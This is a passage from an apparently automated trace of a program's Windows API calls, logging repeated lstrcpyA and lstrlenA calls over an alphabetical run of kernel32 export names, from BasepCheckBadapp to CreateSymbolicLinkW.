lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0178.295] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0178.295] lstrcpyA (in: lpString1=0x239e35c, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0178.295] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0178.295] lstrcpyA (in: lpString1=0x239e35c, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0178.295] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0178.295] lstrcpyA (in: lpString1=0x239e35c, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0178.295] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0178.295] lstrcpyA (in: lpString1=0x239e35c, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0178.295] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0178.295] lstrcpyA (in: lpString1=0x239e35c, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0178.295] lstrlenA (lpString="BEEP") returned 4 [0178.296] lstrcpyA (in: lpString1=0x239e35c, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0178.296] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0178.296] lstrcpyA (in: lpString1=0x239e35c, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0178.296] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0178.296] lstrcpyA (in: lpString1=0x239e35c, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0178.296] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0178.296] lstrcpyA (in: lpString1=0x239e35c, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0178.296] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0178.296] lstrcpyA (in: lpString1=0x239e35c, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0178.296] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0178.296] lstrcpyA (in: lpString1=0x239e35c, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0178.296] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0178.296] lstrcpyA (in: lpString1=0x239e35c, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0178.296] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0178.296] lstrcpyA (in: lpString1=0x239e35c, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0178.296] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0178.296] lstrcpyA (in: lpString1=0x239e35c, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0178.296] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0178.296] lstrcpyA (in: lpString1=0x239e35c, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0178.296] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0178.296] lstrcpyA (in: lpString1=0x239e35c, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0178.296] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0178.296] lstrcpyA (in: lpString1=0x239e35c, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0178.296] lstrlenA (lpString="CANCELIO") returned 8 [0178.296] lstrcpyA (in: lpString1=0x239e35c, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0178.296] lstrlenA (lpString="CANCELIOEX") returned 10 [0178.296] lstrcpyA (in: lpString1=0x239e35c, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0178.296] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0178.296] lstrcpyA (in: lpString1=0x239e35c, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0178.296] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0178.296] lstrcpyA (in: lpString1=0x239e35c, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0178.296] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0178.296] lstrcpyA (in: lpString1=0x239e35c, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0178.296] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0178.296] lstrcpyA (in: lpString1=0x239e35c, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0178.296] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0178.296] lstrcpyA (in: lpString1=0x239e35c, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0178.297] lstrlenA (lpString="CHECKELEVATION") returned 14 [0178.297] lstrcpyA (in: lpString1=0x239e35c, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0178.297] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0178.297] lstrcpyA (in: lpString1=0x239e35c, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0178.297] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0178.297] lstrcpyA (in: lpString1=0x239e35c, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0178.297] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0178.297] lstrcpyA (in: lpString1=0x239e35c, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0178.297] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0178.297] lstrcpyA (in: lpString1=0x239e35c, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0178.297] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0178.297] lstrcpyA (in: lpString1=0x239e35c, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0178.297] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0178.297] lstrcpyA (in: lpString1=0x239e35c, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0178.297] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0178.297] lstrcpyA (in: lpString1=0x239e35c, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0178.297] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0178.297] lstrcpyA (in: lpString1=0x239e35c, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0178.297] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0178.297] lstrcpyA (in: lpString1=0x239e35c, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0178.297] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0178.297] lstrcpyA (in: lpString1=0x239e35c, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0178.297] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0178.297] lstrcpyA (in: lpString1=0x239e35c, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0178.297] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0178.297] lstrcpyA (in: lpString1=0x239e35c, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0178.297] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0178.297] lstrcpyA (in: lpString1=0x239e35c, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0178.297] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0178.297] lstrcpyA (in: lpString1=0x239e35c, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0178.297] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0178.297] lstrcpyA (in: lpString1=0x239e35c, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0178.297] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0178.297] lstrcpyA (in: lpString1=0x239e35c, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0178.297] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0178.297] lstrcpyA (in: lpString1=0x239e35c, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0178.297] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0178.297] lstrcpyA (in: lpString1=0x239e35c, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0178.298] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0178.298] lstrcpyA (in: lpString1=0x239e35c, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0178.298] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0178.298] lstrcpyA (in: lpString1=0x239e35c, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0178.298] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0178.298] lstrcpyA (in: lpString1=0x239e35c, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0178.298] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0178.298] lstrcpyA (in: lpString1=0x239e35c, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0178.298] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0178.298] lstrcpyA (in: lpString1=0x239e35c, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0178.298] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0178.298] lstrcpyA (in: lpString1=0x239e35c, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0178.298] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0178.298] lstrcpyA (in: lpString1=0x239e35c, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0178.298] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0178.298] lstrcpyA (in: lpString1=0x239e35c, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0178.298] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0178.298] lstrcpyA (in: lpString1=0x239e35c, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0178.298] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0178.298] lstrcpyA (in: lpString1=0x239e35c, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0178.298] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0178.298] lstrcpyA (in: lpString1=0x239e35c, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0178.298] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0178.298] lstrcpyA (in: lpString1=0x239e35c, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0178.298] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0178.298] lstrcpyA (in: lpString1=0x239e35c, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0178.298] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0178.298] lstrcpyA (in: lpString1=0x239e35c, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0178.298] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0178.298] lstrcpyA (in: lpString1=0x239e35c, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0178.298] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0178.298] lstrcpyA (in: lpString1=0x239e35c, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0178.298] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0178.298] lstrcpyA (in: lpString1=0x239e35c, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0178.298] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0178.298] lstrcpyA (in: lpString1=0x239e35c, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0178.298] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0178.299] lstrcpyA (in: lpString1=0x239e35c, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0178.299] lstrlenA (lpString="COPYCONTEXT") returned 11 [0178.299] lstrcpyA (in: lpString1=0x239e35c, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0178.299] lstrlenA (lpString="COPYFILEA") returned 9 [0178.299] lstrcpyA (in: lpString1=0x239e35c, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0178.299] lstrlenA (lpString="COPYFILEEXA") returned 11 [0178.299] lstrcpyA (in: lpString1=0x239e35c, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0178.299] lstrlenA (lpString="COPYFILEEXW") returned 11 [0178.299] lstrcpyA (in: lpString1=0x239e35c, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0178.299] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0178.299] lstrcpyA (in: lpString1=0x239e35c, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0178.299] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0178.299] lstrcpyA (in: lpString1=0x239e35c, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0178.299] lstrlenA (lpString="COPYFILEW") returned 9 [0178.299] lstrcpyA (in: lpString1=0x239e35c, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0178.299] lstrlenA (lpString="COPYLZFILE") returned 10 [0178.299] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0178.299] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0178.299] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0178.299] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0178.299] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0178.299] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0178.299] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0178.299] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0178.299] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0178.299] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0178.299] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0178.299] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0178.299] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0178.299] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0178.299] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0178.299] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0178.299] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0178.299] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0178.299] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0178.299] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0178.299] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0178.299] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0178.300] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0178.300] lstrlenA (lpString="CREATEEVENTA") returned 12 [0178.300] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0178.300] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0178.300] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0178.300] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0178.300] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0178.300] lstrlenA (lpString="CREATEEVENTW") returned 12 [0178.300] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0178.300] lstrlenA (lpString="CREATEFIBER") returned 11 [0178.300] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0178.300] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0178.300] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0178.300] lstrlenA (lpString="CREATEFILEA") returned 11 [0178.300] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0178.300] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0178.300] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0178.300] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0178.300] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0178.300] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0178.300] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0178.300] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0178.300] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0178.300] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0178.300] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0178.300] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0178.300] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0178.300] lstrlenA (lpString="CREATEFILEW") returned 11 [0178.300] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0178.300] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0178.300] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0178.300] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0178.300] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0178.300] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0178.300] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0178.300] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0178.300] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0178.300] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0178.301] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0178.301] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0178.301] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0178.301] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0178.301] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0178.301] lstrlenA (lpString="CREATEJOBSET") returned 12 [0178.301] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0178.301] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0178.301] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0178.301] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0178.301] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0178.301] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0178.301] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0178.301] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0178.301] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0178.301] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0178.301] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0178.302] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0178.302] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0178.302] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0178.302] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0178.302] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0178.302] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0178.302] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0178.302] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0178.302] lstrlenA (lpString="CREATEPIPE") returned 10 [0178.302] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0178.302] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0178.302] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0178.302] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0178.302] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0178.302] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0178.302] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0178.302] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0178.302] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0178.302] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0178.302] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0178.302] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0178.302] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0178.302] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0178.302] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0178.302] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0178.302] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0178.302] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0178.302] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0178.302] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0178.302] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0178.302] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0178.302] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0178.302] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0178.302] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0178.302] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0178.302] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0178.302] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0178.302] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0178.303] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0178.303] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0178.303] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0178.303] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0178.303] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0178.303] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateSymbolicLinkW" | out: 